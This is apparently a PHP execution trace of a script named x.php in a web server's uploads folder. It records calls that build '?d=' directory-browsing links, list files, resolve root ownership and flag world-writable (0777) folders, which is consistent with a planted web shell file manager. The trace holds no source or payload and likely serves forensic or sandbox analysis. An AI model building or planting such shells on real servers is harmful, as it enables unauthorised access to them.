2		A						/var/www/html/uploads/x.php	55	$p = ''
2		A						/var/www/html/uploads/x.php	55	$n = ''
3	42	0	0.002243	491472	explode	0		/var/www/html/uploads/x.php	55	2	'/'	'/var/www/html/uploads'
3	42	1	0.002267	492048
3	42	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/x.php	55	$dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/x.php	55	$i = 0
2		A						/var/www/html/uploads/x.php	55	$g = ''
2		A						/var/www/html/uploads/x.php	55	$p .= '/'
2		A						/var/www/html/uploads/x.php	55	$n .= '<a href="?d=/"></a>/'
2		A						/var/www/html/uploads/x.php	55	$i++
2		A						/var/www/html/uploads/x.php	55	$g = 'var'
2		A						/var/www/html/uploads/x.php	55	$p .= 'var/'
2		A						/var/www/html/uploads/x.php	55	$n .= '<a href="?d=/var/">var</a>/'
2		A						/var/www/html/uploads/x.php	55	$i++
2		A						/var/www/html/uploads/x.php	55	$g = 'www'
2		A						/var/www/html/uploads/x.php	55	$p .= 'www/'
2		A						/var/www/html/uploads/x.php	55	$n .= '<a href="?d=/var/www/">www</a>/'
2		A						/var/www/html/uploads/x.php	55	$i++
2		A						/var/www/html/uploads/x.php	55	$g = 'html'
2		A						/var/www/html/uploads/x.php	55	$p .= 'html/'
2		A						/var/www/html/uploads/x.php	55	$n .= '<a href="?d=/var/www/html/">html</a>/'
2		A						/var/www/html/uploads/x.php	55	$i++
2		A						/var/www/html/uploads/x.php	55	$g = 'uploads'
2		A						/var/www/html/uploads/x.php	55	$p .= 'uploads/'
2		A						/var/www/html/uploads/x.php	55	$n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2		A						/var/www/html/uploads/x.php	55	$i++
2	40	1	0.002490	491616
2	40	R			'<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2	43	0	0.002509	491424	realpath	0		/var/www/html/uploads/x.php	35	1	'.'
2	43	1	0.002523	491504
2	43	R			'/var/www/html/uploads'
2	44	0	0.002537	491648	realpath	0		/var/www/html/uploads/x.php	35	1	'.'
2	44	1	0.002550	491728
2	44	R			'/var/www/html/uploads'
2	45	0	0.002565	491808	realpath	0		/var/www/html/uploads/x.php	35	1	'.'
2	45	1	0.002577	491888
2	45	R			'/var/www/html/uploads'
2	46	0	0.002591	491872	realpath	0		/var/www/html/uploads/x.php	35	1	'.'
2	46	1	0.002603	491952
2	46	R			'/var/www/html/uploads'
2	47	0	0.002617	492192	realpath	0		/var/www/html/uploads/x.php	35	1	'.'
2	47	1	0.002629	492272
2	47	R			'/var/www/html/uploads'
2	48	0	0.002642	492320	realpath	0		/var/www/html/uploads/x.php	35	1	'.'
2	48	1	0.002654	492400
2	48	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/x.php	37	$filex = []
1		A						/var/www/html/uploads/x.php	38	$dirx = []
2	49	0	0.002693	491536	opendir	0		/var/www/html/uploads/x.php	40	1	'.'
2	49	1	0.002713	491928
2	49	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/x.php	40	$handle = resource(4) of type (stream)
2	50	0	0.002740	491896	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	50	1	0.002761	491968
2	50	R			'..'
1		A						/var/www/html/uploads/x.php	40	$file = '..'
2	51	0	0.002784	491928	is_dir	0		/var/www/html/uploads/x.php	40	1	'..'
2	51	1	0.002802	491976
2	51	R			TRUE
1		A						/var/www/html/uploads/x.php	40	$dirx[] .= '..'
2	52	0	0.002826	492344	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	52	1	0.002840	492416
2	52	R			'x.php'
1		A						/var/www/html/uploads/x.php	40	$file = 'x.php'
2	53	0	0.002862	492344	is_dir	0		/var/www/html/uploads/x.php	40	1	'x.php'
2	53	1	0.002876	492384
2	53	R			FALSE
1		A						/var/www/html/uploads/x.php	40	$filex[] .= 'x.php'
2	54	0	0.002899	492752	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	54	1	0.002912	492824
2	54	R			'.'
1		A						/var/www/html/uploads/x.php	40	$file = '.'
2	55	0	0.002934	492752	is_dir	0		/var/www/html/uploads/x.php	40	1	'.'
2	55	1	0.002947	492792
2	55	R			TRUE
1		A						/var/www/html/uploads/x.php	40	$dirx[] .= '.'
2	56	0	0.002969	492784	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	56	1	0.002982	492864
2	56	R			'prepend.php'
1		A						/var/www/html/uploads/x.php	40	$file = 'prepend.php'
2	57	0	0.003005	492792	is_dir	0		/var/www/html/uploads/x.php	40	1	'prepend.php'
2	57	1	0.003019	492840
2	57	R			FALSE
1		A						/var/www/html/uploads/x.php	40	$filex[] .= 'prepend.php'
2	58	0	0.003042	492840	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	58	1	0.003055	492912
2	58	R			'data'
1		A						/var/www/html/uploads/x.php	40	$file = 'data'
2	59	0	0.003077	492832	is_dir	0		/var/www/html/uploads/x.php	40	1	'data'
2	59	1	0.003091	492864
2	59	R			TRUE
1		A						/var/www/html/uploads/x.php	40	$dirx[] .= 'data'
2	60	0	0.003113	492856	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	60	1	0.003126	492936
2	60	R			'.htaccess'
1		A						/var/www/html/uploads/x.php	40	$file = '.htaccess'
2	61	0	0.003149	492864	is_dir	0		/var/www/html/uploads/x.php	40	1	'.htaccess'
2	61	1	0.003163	492912
2	61	R			FALSE
1		A						/var/www/html/uploads/x.php	40	$filex[] .= '.htaccess'
2	62	0	0.003185	492912	readdir	0		/var/www/html/uploads/x.php	40	1	resource(4) of type (stream)
2	62	1	0.003199	492952
2	62	R			FALSE
1		A						/var/www/html/uploads/x.php	40	$file = FALSE
2	63	0	0.003221	492896	asort	0		/var/www/html/uploads/x.php	40	1	[0 => 'x.php', 1 => 'prepend.php', 2 => '.htaccess']
2	63	1	0.003238	492928
2	63	R			TRUE
2	64	0	0.003251	492920	asort	0		/var/www/html/uploads/x.php	40	1	[0 => '..', 1 => '.', 2 => 'data']
2	64	1	0.003265	492952
2	64	R			TRUE
1		A						/var/www/html/uploads/x.php	40	$i = 0
2	65	0	0.003286	492920	function_exists	0		/var/www/html/uploads/x.php	41	1	'posix_getpwuid'
2	65	1	0.003300	492960
2	65	R			TRUE
2	66	0	0.003312	492920	function_exists	0		/var/www/html/uploads/x.php	41	1	'posix_getgrgid'
2	66	1	0.003324	492960
2	66	R			TRUE
2	67	0	0.003336	492920	fileowner	0		/var/www/html/uploads/x.php	41	1	'.'
2	67	1	0.003350	492952
2	67	R			0
2	68	0	0.003362	492912	posix_getpwuid	0		/var/www/html/uploads/x.php	41	1	0
2	68	1	0.003386	493712
2	68	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/x.php	41	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	69	0	0.003426	493680	filegroup	0		/var/www/html/uploads/x.php	41	1	'.'
2	69	1	0.003438	493720
2	69	R			0
2	70	0	0.003450	493680	posix_getgrgid	0		/var/www/html/uploads/x.php	41	1	0
2	70	1	0.003472	494336
2	70	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/x.php	41	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2	71	0	0.003506	494368	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	71	1	0.003519	494448
2	71	R			'/var/www/html/uploads'
2	72	0	0.003534	494464	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	72	1	0.003547	494544
2	72	R			'/var/www/html/uploads'
2	73	0	0.003561	494528	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	73	1	0.003578	494608
2	73	R			'/var/www/html/uploads'
2	74	0	0.003593	494944	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	74	1	0.003605	495024
2	74	R			'/var/www/html/uploads'
2	75	0	0.003619	494944	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	75	1	0.003631	495024
2	75	R			'/var/www/html/uploads'
2	76	0	0.003645	495200	get_color	1		/var/www/html/uploads/x.php	41	1	'.'
3	77	0	0.003658	495200	is_writable	0		/var/www/html/uploads/x.php	56	1	'.'
3	77	1	0.003673	495240
3	77	R			TRUE
2		A						/var/www/html/uploads/x.php	56	$c = '#ccff00'
3	78	0	0.003697	495200	is_writable	0		/var/www/html/uploads/x.php	56	1	'.'
3	78	1	0.003710	495240
3	78	R			TRUE
3	79	0	0.003723	495200	is_writable	0		/var/www/html/uploads/x.php	56	1	'.'
3	79	1	0.003736	495240
3	79	R			TRUE
2	76	1	0.003748	495200
2	76	R			'#ccff00'
2	80	0	0.003762	495200	perms	1		/var/www/html/uploads/x.php	41	1	'.'
3	81	0	0.003773	495200	file_exists	0		/var/www/html/uploads/x.php	57	1	'.'
3	81	1	0.003786	495240
3	81	R			TRUE
3	82	0	0.003799	495200	fileperms	0		/var/www/html/uploads/x.php	57	1	'.'
3	82	1	0.003811	495240
3	82	R			16895
3	83	0	0.003823	495200	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	16895
3	83	1	0.003836	495584
3	83	R			'40777'
3	84	0	0.003849	495520	substr	0		/var/www/html/uploads/x.php	57	2	'40777'	-4
3	84	1	0.003861	495616
3	84	R			'0777'
2	80	1	0.003873	495232
2	80	R			'0777'
2	85	0	0.003886	495328	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	85	1	0.003899	495408
2	85	R			'/var/www/html/uploads'
2	86	0	0.003913	495328	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	86	1	0.003925	495408
2	86	R			'/var/www/html/uploads'
2	87	0	0.003939	495584	perms	1		/var/www/html/uploads/x.php	41	1	'.'
3	88	0	0.003951	495584	file_exists	0		/var/www/html/uploads/x.php	57	1	'.'
3	88	1	0.003964	495624
3	88	R			TRUE
3	89	0	0.003976	495584	fileperms	0		/var/www/html/uploads/x.php	57	1	'.'
3	89	1	0.003988	495624
3	89	R			16895
3	90	0	0.004000	495584	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	16895
3	90	1	0.004012	495968
3	90	R			'40777'
3	91	0	0.004025	495904	substr	0		/var/www/html/uploads/x.php	57	2	'40777'	-4
3	91	1	0.004037	496000
3	91	R			'0777'
2	87	1	0.004049	495616
2	87	R			'0777'
1		A						/var/www/html/uploads/x.php	41	$i++
2	92	0	0.004072	494304	function_exists	0		/var/www/html/uploads/x.php	41	1	'posix_getpwuid'
2	92	1	0.004084	494344
2	92	R			TRUE
2	93	0	0.004096	494304	function_exists	0		/var/www/html/uploads/x.php	41	1	'posix_getgrgid'
2	93	1	0.004109	494344
2	93	R			TRUE
2	94	0	0.004121	494304	fileowner	0		/var/www/html/uploads/x.php	41	1	'..'
2	94	1	0.004134	494344
2	94	R			0
2	95	0	0.004146	494304	posix_getpwuid	0		/var/www/html/uploads/x.php	41	1	0
2	95	1	0.004183	495104
2	95	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/x.php	41	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	96	0	0.004223	494304	filegroup	0		/var/www/html/uploads/x.php	41	1	'..'
2	96	1	0.004235	494344
2	96	R			0
2	97	0	0.004247	494304	posix_getgrgid	0		/var/www/html/uploads/x.php	41	1	0
2	97	1	0.004268	494960
2	97	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/x.php	41	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2	98	0	0.004301	494368	realpath	0		/var/www/html/uploads/x.php	41	1	'..'
2	98	1	0.004315	494440
2	98	R			'/var/www/html'
2	99	0	0.004329	494464	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	99	1	0.004342	494544
2	99	R			'/var/www/html/uploads'
2	100	0	0.004356	494528	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	100	1	0.004368	494608
2	100	R			'/var/www/html/uploads'
2	101	0	0.004386	494944	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	101	1	0.004399	495024
2	101	R			'/var/www/html/uploads'
2	102	0	0.004413	494944	realpath	0		/var/www/html/uploads/x.php	41	1	'..'
2	102	1	0.004425	495016
2	102	R			'/var/www/html'
2	103	0	0.004439	495200	get_color	1		/var/www/html/uploads/x.php	41	1	'..'
3	104	0	0.004451	495200	is_writable	0		/var/www/html/uploads/x.php	56	1	'..'
3	104	1	0.004466	495240
3	104	R			TRUE
2		A						/var/www/html/uploads/x.php	56	$c = '#ccff00'
3	105	0	0.004489	495200	is_writable	0		/var/www/html/uploads/x.php	56	1	'..'
3	105	1	0.004502	495240
3	105	R			TRUE
3	106	0	0.004515	495200	is_writable	0		/var/www/html/uploads/x.php	56	1	'..'
3	106	1	0.004528	495240
3	106	R			TRUE
2	103	1	0.004541	495200
2	103	R			'#ccff00'
2	107	0	0.004554	495200	perms	1		/var/www/html/uploads/x.php	41	1	'..'
3	108	0	0.004565	495200	file_exists	0		/var/www/html/uploads/x.php	57	1	'..'
3	108	1	0.004579	495240
3	108	R			TRUE
3	109	0	0.004591	495200	fileperms	0		/var/www/html/uploads/x.php	57	1	'..'
3	109	1	0.004603	495240
3	109	R			16895
3	110	0	0.004615	495200	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	16895
3	110	1	0.004628	495584
3	110	R			'40777'
3	111	0	0.004640	495520	substr	0		/var/www/html/uploads/x.php	57	2	'40777'	-4
3	111	1	0.004653	495616
3	111	R			'0777'
2	107	1	0.004665	495232
2	107	R			'0777'
2	112	0	0.004678	495328	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	112	1	0.004690	495408
2	112	R			'/var/www/html/uploads'
2	113	0	0.004704	495328	realpath	0		/var/www/html/uploads/x.php	41	1	'..'
2	113	1	0.004717	495400
2	113	R			'/var/www/html'
2	114	0	0.004730	495584	perms	1		/var/www/html/uploads/x.php	41	1	'..'
3	115	0	0.004742	495584	file_exists	0		/var/www/html/uploads/x.php	57	1	'..'
3	115	1	0.004755	495624
3	115	R			TRUE
3	116	0	0.004768	495584	fileperms	0		/var/www/html/uploads/x.php	57	1	'..'
3	116	1	0.004780	495624
3	116	R			16895
3	117	0	0.004792	495584	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	16895
3	117	1	0.004804	495968
3	117	R			'40777'
3	118	0	0.004817	495904	substr	0		/var/www/html/uploads/x.php	57	2	'40777'	-4
3	118	1	0.004829	496000
3	118	R			'0777'
2	114	1	0.004841	495616
2	114	R			'0777'
1		A						/var/www/html/uploads/x.php	41	$i++
2	119	0	0.004864	494304	function_exists	0		/var/www/html/uploads/x.php	41	1	'posix_getpwuid'
2	119	1	0.004877	494344
2	119	R			TRUE
2	120	0	0.004888	494304	function_exists	0		/var/www/html/uploads/x.php	41	1	'posix_getgrgid'
2	120	1	0.004901	494344
2	120	R			TRUE
2	121	0	0.004913	494304	fileowner	0		/var/www/html/uploads/x.php	41	1	'data'
2	121	1	0.004926	494344
2	121	R			0
2	122	0	0.004938	494304	posix_getpwuid	0		/var/www/html/uploads/x.php	41	1	0
2	122	1	0.004960	495104
2	122	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/x.php	41	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	123	0	0.004999	494304	filegroup	0		/var/www/html/uploads/x.php	41	1	'data'
2	123	1	0.005011	494344
2	123	R			0
2	124	0	0.005022	494304	posix_getgrgid	0		/var/www/html/uploads/x.php	41	1	0
2	124	1	0.005043	494960
2	124	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/x.php	41	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2	125	0	0.005077	494384	realpath	0		/var/www/html/uploads/x.php	41	1	'data'
2	125	1	0.005092	494472
2	125	R			'/var/www/html/uploads/data'
2	126	0	0.005107	494496	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	126	1	0.005124	494576
2	126	R			'/var/www/html/uploads'
2	127	0	0.005139	494560	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	127	1	0.005151	494640
2	127	R			'/var/www/html/uploads'
2	128	0	0.005165	494944	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	128	1	0.005181	495024
2	128	R			'/var/www/html/uploads'
2	129	0	0.005195	494944	realpath	0		/var/www/html/uploads/x.php	41	1	'data'
2	129	1	0.005207	495032
2	129	R			'/var/www/html/uploads/data'
2	130	0	0.005221	495328	get_color	1		/var/www/html/uploads/x.php	41	1	'data'
3	131	0	0.005233	495328	is_writable	0		/var/www/html/uploads/x.php	56	1	'data'
3	131	1	0.005248	495368
3	131	R			TRUE
2		A						/var/www/html/uploads/x.php	56	$c = '#ccff00'
3	132	0	0.005271	495328	is_writable	0		/var/www/html/uploads/x.php	56	1	'data'
3	132	1	0.005285	495368
3	132	R			TRUE
3	133	0	0.005297	495328	is_writable	0		/var/www/html/uploads/x.php	56	1	'data'
3	133	1	0.005311	495368
3	133	R			TRUE
2	130	1	0.005323	495328
2	130	R			'#ccff00'
2	134	0	0.005337	495328	perms	1		/var/www/html/uploads/x.php	41	1	'data'
3	135	0	0.005348	495328	file_exists	0		/var/www/html/uploads/x.php	57	1	'data'
3	135	1	0.005362	495368
3	135	R			TRUE
3	136	0	0.005374	495328	fileperms	0		/var/www/html/uploads/x.php	57	1	'data'
3	136	1	0.005386	495368
3	136	R			16895
3	137	0	0.005398	495328	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	16895
3	137	1	0.005411	495712
3	137	R			'40777'
3	138	0	0.005423	495648	substr	0		/var/www/html/uploads/x.php	57	2	'40777'	-4
3	138	1	0.005435	495744
3	138	R			'0777'
2	134	1	0.005448	495360
2	134	R			'0777'
2	139	0	0.005461	495328	realpath	0		/var/www/html/uploads/x.php	41	1	'.'
2	139	1	0.005473	495408
2	139	R			'/var/www/html/uploads'
2	140	0	0.005487	495584	realpath	0		/var/www/html/uploads/x.php	41	1	'data'
2	140	1	0.005500	495672
2	140	R			'/var/www/html/uploads/data'
2	141	0	0.005514	495584	perms	1		/var/www/html/uploads/x.php	41	1	'data'
3	142	0	0.005525	495584	file_exists	0		/var/www/html/uploads/x.php	57	1	'data'
3	142	1	0.005539	495624
3	142	R			TRUE
3	143	0	0.005551	495584	fileperms	0		/var/www/html/uploads/x.php	57	1	'data'
3	143	1	0.005563	495624
3	143	R			16895
3	144	0	0.005575	495584	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	16895
3	144	1	0.005587	495968
3	144	R			'40777'
3	145	0	0.005599	495904	substr	0		/var/www/html/uploads/x.php	57	2	'40777'	-4
3	145	1	0.005612	496000
3	145	R			'0777'
2	141	1	0.005624	495616
2	141	R			'0777'
1		A						/var/www/html/uploads/x.php	41	$i++
2	146	0	0.005801	494304	function_exists	0		/var/www/html/uploads/x.php	42	1	'posix_getpwuid'
2	146	1	0.005815	494344
2	146	R			TRUE
2	147	0	0.005828	494304	function_exists	0		/var/www/html/uploads/x.php	42	1	'posix_getgrgid'
2	147	1	0.005841	494344
2	147	R			TRUE
2	148	0	0.005853	494304	fileowner	0		/var/www/html/uploads/x.php	42	1	'.htaccess'
2	148	1	0.005868	494352
2	148	R			0
2	149	0	0.005880	494312	posix_getpwuid	0		/var/www/html/uploads/x.php	42	1	0
2	149	1	0.005903	495112
2	149	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/x.php	42	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	150	0	0.005944	494312	filegroup	0		/var/www/html/uploads/x.php	42	1	'.htaccess'
2	150	1	0.005957	494352
2	150	R			0
2	151	0	0.005969	494312	posix_getgrgid	0		/var/www/html/uploads/x.php	42	1	0
2	151	1	0.005990	494968
2	151	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/x.php	42	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2	152	0	0.006025	494392	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	152	1	0.006038	494472
2	152	R			'/var/www/html/uploads'
2	153	0	0.006053	494504	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	153	1	0.006066	494584
2	153	R			'/var/www/html/uploads'
2	154	0	0.006080	494568	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	154	1	0.006092	494648
2	154	R			'/var/www/html/uploads'
2	155	0	0.006111	494952	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	155	1	0.006123	495032
2	155	R			'/var/www/html/uploads'
2	156	0	0.006137	495080	realpath	0		/var/www/html/uploads/x.php	42	1	'.htaccess'
2	156	1	0.006152	495168
2	156	R			'/var/www/html/uploads/.htaccess'
2	157	0	0.006168	495336	get_color	1		/var/www/html/uploads/x.php	42	1	'.htaccess'
3	158	0	0.006180	495336	is_writable	0		/var/www/html/uploads/x.php	56	1	'.htaccess'
3	158	1	0.006195	495376
3	158	R			FALSE
3	159	0	0.006208	495336	is_writable	0		/var/www/html/uploads/x.php	56	1	'.htaccess'
3	159	1	0.006222	495376
3	159	R			FALSE
3	160	0	0.006234	495336	is_readable	0		/var/www/html/uploads/x.php	56	1	'.htaccess'
3	160	1	0.006248	495376
3	160	R			TRUE
2		A						/var/www/html/uploads/x.php	56	$c = ''
3	161	0	0.006273	495336	is_writable	0		/var/www/html/uploads/x.php	56	1	'.htaccess'
3	161	1	0.006287	495376
3	161	R			FALSE
3	162	0	0.006300	495336	is_readable	0		/var/www/html/uploads/x.php	56	1	'.htaccess'
3	162	1	0.006313	495376
3	162	R			TRUE
2	157	1	0.006326	495336
2	157	R			''
2	163	0	0.006339	495336	perms	1		/var/www/html/uploads/x.php	42	1	'.htaccess'
3	164	0	0.006350	495336	file_exists	0		/var/www/html/uploads/x.php	57	1	'.htaccess'
3	164	1	0.006364	495376
3	164	R			TRUE
3	165	0	0.006377	495336	fileperms	0		/var/www/html/uploads/x.php	57	1	'.htaccess'
3	165	1	0.006389	495376
3	165	R			33188
3	166	0	0.006401	495336	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	33188
3	166	1	0.006413	495720
3	166	R			'100644'
3	167	0	0.006426	495656	substr	0		/var/www/html/uploads/x.php	57	2	'100644'	-4
3	167	1	0.006438	495752
3	167	R			'0644'
2	163	1	0.006451	495368
2	163	R			'0644'
2	168	0	0.006464	495592	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	168	1	0.006477	495672
2	168	R			'/var/www/html/uploads'
2	169	0	0.006491	495592	realpath	0		/var/www/html/uploads/x.php	42	1	'.htaccess'
2	169	1	0.006504	495680
2	169	R			'/var/www/html/uploads/.htaccess'
2	170	0	0.006518	495592	perms	1		/var/www/html/uploads/x.php	42	1	'.htaccess'
3	171	0	0.006530	495592	file_exists	0		/var/www/html/uploads/x.php	57	1	'.htaccess'
3	171	1	0.006544	495632
3	171	R			TRUE
3	172	0	0.006557	495592	fileperms	0		/var/www/html/uploads/x.php	57	1	'.htaccess'
3	172	1	0.006569	495632
3	172	R			33188
3	173	0	0.006581	495592	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	33188
3	173	1	0.006593	495976
3	173	R			'100644'
3	174	0	0.006605	495912	substr	0		/var/www/html/uploads/x.php	57	2	'100644'	-4
3	174	1	0.006618	496008
3	174	R			'0644'
2	170	1	0.006630	495624
2	170	R			'0644'
2	175	0	0.006644	494312	function_exists	0		/var/www/html/uploads/x.php	42	1	'posix_getpwuid'
2	175	1	0.006657	494352
2	175	R			TRUE
2	176	0	0.006669	494312	function_exists	0		/var/www/html/uploads/x.php	42	1	'posix_getgrgid'
2	176	1	0.006682	494352
2	176	R			TRUE
2	177	0	0.006694	494312	fileowner	0		/var/www/html/uploads/x.php	42	1	'prepend.php'
2	177	1	0.006709	494352
2	177	R			0
2	178	0	0.006721	494312	posix_getpwuid	0		/var/www/html/uploads/x.php	42	1	0
2	178	1	0.006743	495112
2	178	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/x.php	42	$own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	179	0	0.006783	494312	filegroup	0		/var/www/html/uploads/x.php	42	1	'prepend.php'
2	179	1	0.006796	494352
2	179	R			0
2	180	0	0.006808	494312	posix_getgrgid	0		/var/www/html/uploads/x.php	42	1	0
2	180	1	0.006828	494968
2	180	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/x.php	42	$grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2	181	0	0.006862	494392	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	181	1	0.006875	494472
2	181	R			'/var/www/html/uploads'
2	182	0	0.006894	494536	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	182	1	0.006908	494616
2	182	R			'/var/www/html/uploads'
2	183	0	0.006921	494632	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	183	1	0.006933	494712
2	183	R			'/var/www/html/uploads'
2	184	0	0.006948	494952	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	184	1	0.006960	495032
2	184	R			'/var/www/html/uploads'
2	185	0	0.006974	495080	realpath	0		/var/www/html/uploads/x.php	42	1	'prepend.php'
2	185	1	0.006987	495176
2	185	R			'/var/www/html/uploads/prepend.php'
2	186	0	0.007003	495336	get_color	1		/var/www/html/uploads/x.php	42	1	'prepend.php'
3	187	0	0.007016	495336	is_writable	0		/var/www/html/uploads/x.php	56	1	'prepend.php'
3	187	1	0.007031	495376
3	187	R			FALSE
3	188	0	0.007044	495336	is_writable	0		/var/www/html/uploads/x.php	56	1	'prepend.php'
3	188	1	0.007058	495376
3	188	R			FALSE
3	189	0	0.007071	495336	is_readable	0		/var/www/html/uploads/x.php	56	1	'prepend.php'
3	189	1	0.007084	495376
3	189	R			TRUE
2		A						/var/www/html/uploads/x.php	56	$c = ''
3	190	0	0.007108	495336	is_writable	0		/var/www/html/uploads/x.php	56	1	'prepend.php'
3	190	1	0.007123	495376
3	190	R			FALSE
3	191	0	0.007135	495336	is_readable	0		/var/www/html/uploads/x.php	56	1	'prepend.php'
3	191	1	0.007149	495376
3	191	R			TRUE
2	186	1	0.007162	495336
2	186	R			''
2	192	0	0.007174	495336	perms	1		/var/www/html/uploads/x.php	42	1	'prepend.php'
3	193	0	0.007186	495336	file_exists	0		/var/www/html/uploads/x.php	57	1	'prepend.php'
3	193	1	0.007200	495376
3	193	R			TRUE
3	194	0	0.007213	495336	fileperms	0		/var/www/html/uploads/x.php	57	1	'prepend.php'
3	194	1	0.007226	495376
3	194	R			33261
3	195	0	0.007238	495336	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	33261
3	195	1	0.007251	495720
3	195	R			'100755'
3	196	0	0.007264	495656	substr	0		/var/www/html/uploads/x.php	57	2	'100755'	-4
3	196	1	0.007276	495752
3	196	R			'0755'
2	192	1	0.007289	495368
2	192	R			'0755'
2	197	0	0.007302	495592	realpath	0		/var/www/html/uploads/x.php	42	1	'.'
2	197	1	0.007315	495672
2	197	R			'/var/www/html/uploads'
2	198	0	0.007329	495592	realpath	0		/var/www/html/uploads/x.php	42	1	'prepend.php'
2	198	1	0.007342	495688
2	198	R			'/var/www/html/uploads/prepend.php'
2	199	0	0.007357	495592	perms	1		/var/www/html/uploads/x.php	42	1	'prepend.php'
3	200	0	0.007369	495592	file_exists	0		/var/www/html/uploads/x.php	57	1	'prepend.php'
3	200	1	0.007384	495632
3	200	R			TRUE
3	201	0	0.007396	495592	fileperms	0		/var/www/html/uploads/x.php	57	1	'prepend.php'
3	201	1	0.007409	495632
3	201	R			33261
3	202	0	0.007421	495592	sprintf	0		/var/www/html/uploads/x.php	57	2	'%o'	33261
3	202	1	0.007434	495976
3	202	R			'100755'
3	203	0	0.007446	495912	substr	0		/var/www/html/uploads/x.php	57	2	'100755'	-4
3	203	1	0.007459	496008
3	203	R			'0755'
2	199	1	0.007477	495624
2	199	R			'0755'
2	204	0	0.007498	494312	function_exists	0		/var/www/html/uploads/x.php	42	1	'posix_getpwuid'
2	204	1	0.007517	494352
2	204	R			TRUE
2	205	0	0.007535	494312	function_exists	0		/var/www/html/uploads/x.php	42	1	'posix_getgrgid'
2	205	1	0.007554	494352
2	205	R			TRUE
